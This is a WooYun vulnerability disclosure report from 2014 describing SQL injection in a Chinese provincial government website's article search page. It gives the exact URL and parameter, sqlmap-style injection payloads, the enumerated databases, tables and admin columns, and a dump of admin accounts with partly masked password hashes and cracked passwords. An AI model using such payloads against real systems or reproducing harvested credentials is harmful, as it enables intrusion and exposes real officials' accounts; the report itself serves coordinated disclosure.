当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069872

漏洞标题:某省工信委网站存在SQL注入漏洞,可获取管理员数据与执行系统命令

相关厂商:www.gxgxw.gov.cn

漏洞作者: 路人甲

提交时间:2014-07-27 22:41

修复时间:2014-09-10 22:42

公开时间:2014-09-10 22:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-27: 细节已通知厂商并且等待厂商处理中
2014-07-31: 厂商已经确认,细节仅向厂商公开
2014-08-10: 细节向核心白帽子及相关领域专家公开
2014-08-20: 细节向普通白帽子公开
2014-08-30: 细节向实习白帽子公开
2014-09-10: 细节向公众公开

简要描述:

网页代码开发问题,存在SQL注入漏洞,通过SQL拼接送入数据库中执行,可获取管理员数据与执行系统命令。

详细说明:

存在漏洞URL:http://www.gxgxw.gov.cn/CommonPage/ArticleSearchResults.aspx?publishDate=2014-07-01
存在漏洞参数:publishDate
方式:get

漏洞证明:

Place: GET
Parameter: publishDate
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: publishDate=2014-05-30' AND 6919=6919 AND 'Ogma'='Ogma
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: publishDate=2014-05-30' AND 8263=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(97)+CHAR(111)+CHAR(113)+(SELECT (CASE WHE
N (8263=8263) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(101)+CHAR(113))) AND 'DTVG'='DTVG
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: publishDate=2014-05-30'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: publishDate=2014-05-30' WAITFOR DELAY '0:0:5'--


库:

available databases [6]:
[*] db_gxw_ycfx
[*] gxjw
[*] master
[*] model
[*] msdb
[*] tempdb


gxjw的表:

Database: gxjw
[24 tables]
+---------------------+
| Admin               |
| Article             |
| ArticleClass        |
| Department          |
| Documents           |
| EmailOfLeaders      |
| GraphicInfo         |
| GraphicType         |
| Photos              |
| Projects            |
| PublicApplication   |
| Questions           |
| Roles               |
| SpecialArticleClass |
| SugarPrice          |
| Suggestions         |
| Topic               |
| UserGroup           |
| Users               |
| View_Admin          |
| View_Article        |
| View_GraphInfo      |
| View_SpecialArticle |
| VisitsAndLetters    |
+---------------------+


Admin字段:

Database: gxjw
Table: Admin
[18 columns]
+----------------+------+
| Column         | Type |
+----------------+------+
| adminId        | int  |
| deptId         | int  |
| email          | char |
| homeAddress    | char |
| isChecked      | bit  |
| lastLoginIP    | char |
| lastLoginTime  | char |
| lastLogoutTime | char |
| loginName      | char |
| loginTimes     | int  |
| mobilePhone    | char |
| officeAddress  | char |
| officePhone    | char |
| password       | char |
| peoples        | char |
| realName       | char |
| roleId         | int  |
| sex            | char |
+----------------+------+


数据(原始数据、译开密码、人名后两位加星):

2|admin|5cab8c4d17760e2a35ee65bf943082**   (gxgxwxx**)|管理员|
9|qjlqjl|2ad3c409a73b80830b426d788ae85d**     (qjl4**)秦**|
14|pubing|a82d226bac54db82dadf8049ab68ef**  (28030**)|蒲*|
16|xtnxing|93bd21d8b2482913e35399b55d560a**  |夏**|
17|shaoguofu|aa405869b29ca387bc7ff7615c78d4** |邵**|
18|tangzh |b29ccde3db588ff10ff5e93c3b3f15**   ( simplelo** )|唐*|
19|laochzhi|25f9e794323b453885f5181f1b624d**     ( 1234567** )|劳**|
21|test002|351523b8e6eb36ae5115205886f36f**     ( test0** )|李**|


修复方案:

检查网站注入漏洞,检查网站执行系统命令痕迹。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-07-31 21:56

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无